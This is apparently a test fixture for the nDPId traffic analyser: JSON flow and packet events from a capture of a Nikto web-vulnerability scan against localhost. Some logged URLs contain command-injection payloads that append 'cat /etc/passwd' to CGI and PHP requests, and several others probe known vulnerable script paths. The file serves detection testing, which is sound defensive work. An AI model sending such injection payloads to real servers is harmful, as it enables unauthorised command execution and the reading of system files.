01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="}
01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01102{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
